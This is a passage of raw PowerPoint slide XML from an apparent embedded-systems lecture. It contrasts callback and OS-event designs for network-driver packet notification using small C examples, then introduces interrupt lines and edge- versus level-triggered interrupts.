            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Callback</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: driver calls a function pointer that was set by the application at init time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Event:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> the driver signals an OS event that was set by the application at init time</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What are the advantages and disadvantages of each method?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="339330061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381000" y="1219200"/>
            <a:ext cx="3429000" cy="1570038"/>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chemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_Interrupt1 </a:t>
            </a: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NetISR</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8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// check packet RX</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3048000"/>
            <a:ext cx="3429000" cy="1077913"/>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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19460" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="1219200"/>
            <a:ext cx="4191000" cy="3046413"/>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(*RxHandler)();</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NetInit(</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(*func)())</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   RxHandler=func;</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_Interrupt1 </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NetISR()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   // check packet 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RxHandler();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4648200" y="4419600"/>
            <a:ext cx="4191000" cy="2308225"/>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a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pP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NetInit</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rgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19462" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="609600"/>
            <a:ext cx="235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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INCORRECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19463" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5867400" y="619125"/>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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORRECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="256311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System Languages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1050" dirty="0" smtClean="0"/>
              <a:t>* embedded.com</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="32772" name="Picture 4" descr="http://www.eetimes.com/ContentEETimes/Images/Design/Embedded/2012/0512/0512esdSaks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877" y="3352800"/>
            <a:ext cx="59626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http://www.eetimes.com/ContentEETimes/Images/Design/Embedded/2012/0512/0512esdSak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51054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23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381000" y="1219200"/>
            <a:ext cx="3429000" cy="2062163"/>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chemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>OS_EVENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PktRx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>_Interrupt1 </a:t>
            </a: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NetISR</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8000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// check packet RX</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OsSetEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PktRx</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="381000" y="3505200"/>
            <a:ext cx="3429000" cy="2308225"/>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extern</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> OS_EVENT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PktRx</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent4">
                  <a:lumMod val="10000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>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main()</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while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (1)</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OsWaitEvent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent4">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>PktRx</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p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20484" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="1219200"/>
            <a:ext cx="3886200" cy="2800350"/>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OS_EVENT *PktRx</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NetInit(OS_EVENT* event)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   PktRx=event;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_Interrupt1 </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NetISR()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>   // check packet 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OsSetEvent(*PktRx)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20485" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4953000" y="4343400"/>
            <a:ext cx="3810000" cy="2308225"/>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OS_EVENT PktRx</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main()</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NetInit(&amp;PktRx);</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while</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (1)</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OsWaitEvent(PktRx);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
        <p:nvSpPr>
          <p:cNvPr id="20486" name="TextBox 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="990600" y="609600"/>
            <a:ext cx="235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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>INCORRECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20487" name="TextBox 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="609600"/>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008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORRECT</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33603705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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Interrupts in Depth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="422190728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en-US" smtClean="0"/>
              <a:t>Interrupt Lines</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102403" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1600200"/>
            <a:ext cx="8077200" cy="2667000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The processor has several </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>interrupt lines</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> into it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The lines are connected to the peripherals</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The peripheral </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>asserts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> the line when the interrupt occurs</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Also said that the peripheral issues an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>interrupt request (IRQ)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Multiple peripherals may </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>share</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> the same line</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2050" name="Object 13"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2468279783"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1981200" y="3962400"/>
          <a:ext cx="4037013" cy="2620963"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s15397" name="Visio" r:id="rId3" imgW="2770700" imgH="1798752" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2770700" imgH="1798752" progId="Visio.Drawing.11">
                  <p:embed/>
                  <p:pic>
                    <p:nvPicPr>
                      <p:cNvPr id="0" name=""/>
                      <p:cNvPicPr>
                        <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                      </p:cNvPicPr>
                      <p:nvPr/>
                    </p:nvPicPr>
                    <p:blipFill>
                      <a:blip r:embed="rId4"/>
                      <a:srcRect/>
                      <a:stretch>
                        <a:fillRect/>
                      </a:stretch>
                    </p:blipFill>
                    <p:spPr bwMode="auto">
                      <a:xfrm>
                        <a:off x="1981200" y="3962400"/>
                        <a:ext cx="4037013" cy="2620963"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                    </p:spPr>
                  </p:pic>
                </p:oleObj>
              </mc:Fallback>
            </mc:AlternateContent>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="169497601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en-US" smtClean="0"/>
              <a:t>Edge vs. Level interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97283" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="1524000"/>
            <a:ext cx="8077200" cy="4114800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>An </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" i="1" smtClean="0"/>
              <a:t>edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t> interrupt means that the device asserts the interrupt line when the event occurs, and then deasserts it</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>The processor is sensitive to the signal’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>falling/rising edge</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>An interrupt that occurs when interrupts are disabled will be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" i="1" smtClean="0"/>
              <a:t>missed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3074" name="Object 10"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1" noChangeAspect="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1219200" y="4495800"/>
          <a:ext cx="3581400" cy="1709738"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
            <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
              <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                <p:oleObj spid="_x0000_s16421" name="Visio" r:id="rId3" imgW="2065782" imgH="985647" progId="Visio.Drawing.11">
                  <p:embed/>
                </p:oleObj>
              </mc:Choice>
              <mc:Fallback>
                <p:oleObj name="Visio" r:id="rId3" imgW="2065782" imgH="985647"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95800"/>
                        <a:ext cx="3581400" cy="17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39345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en-US" smtClean="0"/>
              <a:t>Edge vs. Level interrupts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="99331" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
